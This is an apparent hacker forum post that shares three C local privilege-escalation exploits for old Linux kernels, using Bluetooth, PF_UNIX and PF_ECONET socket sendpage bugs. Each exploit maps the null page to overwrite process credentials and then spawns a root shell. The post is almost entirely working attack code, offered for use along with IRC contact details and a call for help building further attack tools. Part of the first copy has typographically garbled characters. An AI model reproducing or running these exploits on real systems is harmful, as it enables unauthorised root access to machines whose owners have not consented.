Ok 2 variants,since an idiot 1337sht.com ppl leaked things they dont yet even know how to make BEST use of but anyhow.. here, some gifts… and one is special :< unf is goin to b patched or is patched..depends on what you also do, but mmap is a big trick , b sure to also remmber the UNIX socket prblem, can mmap null page and workable with bsd
Yes its patched but, only with latest free-bsd update .. hehe...nasty!
Code for Bluetouth socketx, with fixed mmap...a shitty old vuln wich was not really leaked onto exploit places like 1337shit.com or whatever they call themself... lamahs i call them
/* Bluetooth Sendpage socket() local root exploit
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 – 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
task_struct = current_stack_pointer() & ~(8192 – 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 – 1);
#else
task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize() /* use this in 2011! (xd) */
int main(void) {
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
// ye dunno why the other idjits are still tryin to nullpage mmap..useless can do it easier like..
if ((addr=mmap(0×0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
perror("- mmap failed");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = ‘\xff’;
addr[1] = ‘\x24′;
addr[2] = ‘\x25′;
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = ‘\xff’;
addr[1] = ‘\x25′;
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = ‘\x3f’;
addr[1] = ‘\xe0′;
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = ‘\x63′;
addr[5] = ‘\xff’;
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = ‘\x7f’;
addr[9] = ‘\xe9′;
addr[10] = ‘\x03′;
addr[11] = ‘\xa6′;
addr[12] = ‘\x4e’;
addr[13] = ‘\x80′;
addr[14] = ‘\x04′;
addr[15] = ‘\x20′;
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("- socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("- mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("- unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("- ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Code for PF_UNIX sendpage() socketx (my version):
/* UNIX socket() local root exploit (OS Portable version)
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int main(void) {
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
perror("- mmap failed");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("- socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("- mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("- unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("- ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
NOTE: that can be added to BSD easily...
Finally, the Econet,wich is a fail usually but has worked on a few *select* 2011 (very nice) kernels..and prooven.
/* PF_ECONET sendpage-raw local root exploit 2011
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!
int main(void) {
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
perror("- mmap failed");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_ECONET,SOCK_RAW,0)) == -1) { //my baby
perror("- socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("- mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("- unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("- ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Again, enjoy the *right* made stuff , not taking credit for but, definately fixing some things and adjusting some releases wich seem to now be many forkbombs... i dislike that, either rls your pvts, wich may be ok for even ONE kern, as i am, forsure after a OpenVZ kernel-local, and some kind of OpenVZ attacker in general..interested, email me here/pm whatever.
I can b found on efnet as xd-- / #haxnet or Undernet nickname xds #zombie channel
I look forward to any new things, atm, i can safely say upto 2010, i have covered in ONE neat setup of only 4 exploits..wich is ok.
So, am trying to make a perfect BSD-Linux-x86_64-OpenVZ payload style scanner, any influence is welcome..
Note: i notice this site has HUGE ranks, so if your stuff got here, your damn lucky buddy!
xd